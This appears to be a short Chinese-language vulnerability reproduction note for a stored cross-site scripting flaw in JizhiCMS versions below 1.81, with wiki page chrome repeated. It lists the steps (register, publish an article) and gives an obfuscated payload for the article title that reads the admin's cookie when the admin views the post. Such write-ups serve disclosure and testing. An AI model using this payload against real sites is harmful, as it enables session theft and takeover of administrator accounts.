极致CMS 1.81以下版本 存储型XSS
漏洞复现
登录管理员添加模块
注册用户
点击发布文章
在文章标题处插入xss payload
<details open ontoggle= confirm(document[`coo`+`kie`])>
当管理员访问时XSS成功
参考
Last updated
Was this helpful?
登录管理员添加模块
注册用户
点击发布文章
在文章标题处插入xss payload
<details open ontoggle= confirm(document[`coo`+`kie`])>
当管理员访问时XSS成功
Last updated
Was this helpful?